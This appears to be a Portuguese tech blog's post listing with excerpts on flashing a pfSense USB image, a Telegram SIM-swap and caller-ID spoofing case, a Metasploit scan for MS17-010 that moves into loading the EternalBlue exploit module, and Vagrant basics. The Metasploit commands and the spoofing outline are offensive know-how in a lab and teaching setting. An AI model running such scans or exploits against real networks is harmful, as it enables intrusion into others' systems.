Postagens

Criando um pendrive pfSense no Linux

Imagem
Olá vamos aprender hoje como gravar um arquivo .img dentro de um pendrive no Linux Para nosso laboratorio vamos fazer um download de uma imagem do Firewall pfSense Fazendo download da imagem https://www.pfsense.org/download/ Descompactanto o arquivo .gz após download $ gzip -d pfSense-CE-memstick-serial-2.4.5-RELEASE-p1-amd64.img.gz Conecte o dispositivo em seu Desktop/Notebook $ sudo dmesg Nota: este comando vai trazer qual é o dispositivo que será conectado no seu Desktop/Notebook Zerando o pendrive destino $ sudo dd if=/dev/zero of=/dev/sdz bs=1M count=1 Gravando arquivo no pendrive destino $ sudo dd if=<image_file_name> of=<usb_disk_device_name> Exemplo $ sudo dd if=file1.img of=/dev/sdb bs=4M Com esse tutorial entendemos criar um pendrive para utilizar em nossas instalações pfSense (via serial)

Celular hackeado (Telegram)

PREMISSA: TODO CONTEUDO ABAIXO SERVE APENAS PARA FINS ACADÊMICOS E ENTENDIMENTO DO QUE ACONTECEU COM O "CLONE" DA LINHA. Celular hackeado (Telegram) SIM Swap Operação Spoofing Objetivo Acessar as contas de Telegram das vitimas Procedimento de login 1. numero de telefone que envia um SMS vai acessar o login 2. caso falhe receber uma ligação Acessar as caixas postais das vitimas Ligar para seu próprio numero Caller ID Spoofing ** esse e o cara!!! Camuflagem do remetente --> Manipulação de uma informação dentro da telefonia Caller ID (identificativo de quem esta ligando) Software VOIP Deixar o telefone ocupado DEIXAR CLARO QUE: 1. Falha foi das operadoras (sem senhas) acesso a caixa postal; 2. Telegram das vitimas (não acessou os dados do celular); O que fazer para me proteger? Ativar a autenticação de dois fatores

Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue. A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado https://www.kali.org/downloads/ Comandos dentro do Kali Linux # service postgresql start # msfconsole msf5 > search smb_ms17_010 msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24 msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100 msf5 auxiliary(scanner/smb/smb_ms17_010) > run Quando a vulnerabilidade for identificada teremos a saida "Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86" msf5 auxiliary(scanner/smb/smb_ms17_010) > back msf5 > search ms17_010_eternalblue msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternal...

Conhecendo o Vagrant

Imagem
Olá hoje vamos falar de um assunto muito importante para você sysadmin ou desenvolver que precisa de agilidade. O Vagrant é um projeto que permite virtualizar o ambiente de desenvolvimento de forma simples. Premissa ter um bare metal (VirtualBox, Vmware, Hypervisor) https://www.virtualbox.org/ (é o que eu utilizo no dia a dia) Site Vagrant para Download https://www.vagrantup.com/downloads.html Download pela própria distribuição Linux (de boa preferência eu estou usando o Debian Buster 10) $ sudo apt-get install vagrant -y Vagrant Box (maquinas prontas) Criar um diretório (de sua preferência onde vai criar suas vm's) Para instalar os boxes (Discover Vagrant Boxes) $ vagrant box add centos/7 (com esse comando ele vai instalar o centOS) Após o processo de download da máquina veja a saída do arquivo Listando as maquinas $ vagrant box list Criando a VM (veja a saída do arquivo) $ vagrant init Arquivo de configuração (similar ao dockerfile) $ vim Va...